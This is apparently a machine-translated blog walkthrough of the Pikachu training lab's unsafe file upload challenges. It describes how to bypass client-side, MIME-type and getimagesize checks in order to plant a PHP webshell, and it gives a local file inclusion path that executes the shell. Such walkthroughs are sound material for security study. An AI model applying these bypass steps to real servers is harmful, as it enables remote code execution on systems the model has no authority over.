Pikachu-Unsafe Fileupload (unsafe file upload)

Others 2020-02-24 00:09:06 views: null

Unsafe file upload vulnerability Overview

File upload function in the web are common applications, such as many sites registered when the need to upload picture, upload attachments, and so on. When the user clicks the Upload button, the background will upload the file to determine whether such is the specified type, extension, size, etc., and then rename the directory after storage in accordance with the format specified design. If the background of the uploaded files without any judgment or judgment of the security condition is not stringent enough, an attacker could upload a malicious file, such as a word Trojan, causing back-end server is webshell .

So, when designing a file upload function, be sure to strict security file passed in. For example:
- verify the file type, extension, size ;
- uploading verification documents ;
- the file certain complex renaming ;
- Do not expose the path after file upload ;
- and so on ...

 

 

client check

1. Try uploading php sentence,

 

 

 

2. The php word picture suffix to suffix, such as JPG , PNG , continue to upload and capture

 

 

 

3. the .jpg suffix to php after contracting, uploaded successfully

 

 

 

 

MIME type

1. Try uploading php sentence,

 

 

 

2. The change jpg suffix, capture, change php suffixes, contracting,

 

 

 

3. In fact, this was supposed to be by limiting the whitelist, follow the prompts view, you can modify the mime type of bypass, burpsuite reform package which uploads

 

 

 

Here changed image / jpeg

 

 

 

Contract, uploaded successfully,

 

 

 

 

getimagesize

1. Code of MIME type is also verified, but this is a small problem, we found it by following the getimagesize () function to obtain information about a picture, upload pictures to verify whether the picture is fake and limit the system to upload size can not exceed 50KB , and the name of the file after the upload has been renamed the operation.

 

2. First, we need to modify the Trojan file, add in front of the file GIF89a thereby bypassing deceive getimagesize function, or by the windows of dos be pictures and interface php merger .

 

3.利用本地包含漏洞include.php?filename=../../unsafeupload/uploads/2020/02/22/2455306d6b5aec7d419826309450.jpg可运行马

 

 

 

 

Guess you like

Origin www.cnblogs.com/joker-vip/p/12355132.html
Recommended
The “35-year-old curse” of Chinese coders
蘭雅 CorelDRAW 插件 2024.5.1 国际劳动节版,免费下载
Ranking
Methods and Practices of Manufacturing Data Quality Improvement
Serial port upgrade program for efficient transmission of large firmware
Use KITTI to run LIOSAM and complete the EVO evaluation
Calling methods on string literals (Java)
ActiveMQ and Spring integration (4)
You have to know the HTTPS! ! !
PAT whether Structures and Algorithms 7-4 with a binary search tree (40 rows streamlined structure)
el-upload brings request background
UVA - 1204 Fun Game-like pressure dp
2019-12-28
Daily
More
2024-05-04(18)
2024-05-03(8)
2024-05-02(0)
2024-05-01(4)
2024-04-30(36)
2024-04-29(5)
2024-04-28(12)
2024-04-27(29)
2024-04-26(22)
2024-04-25(32)

Code World

© 2018 codetd.com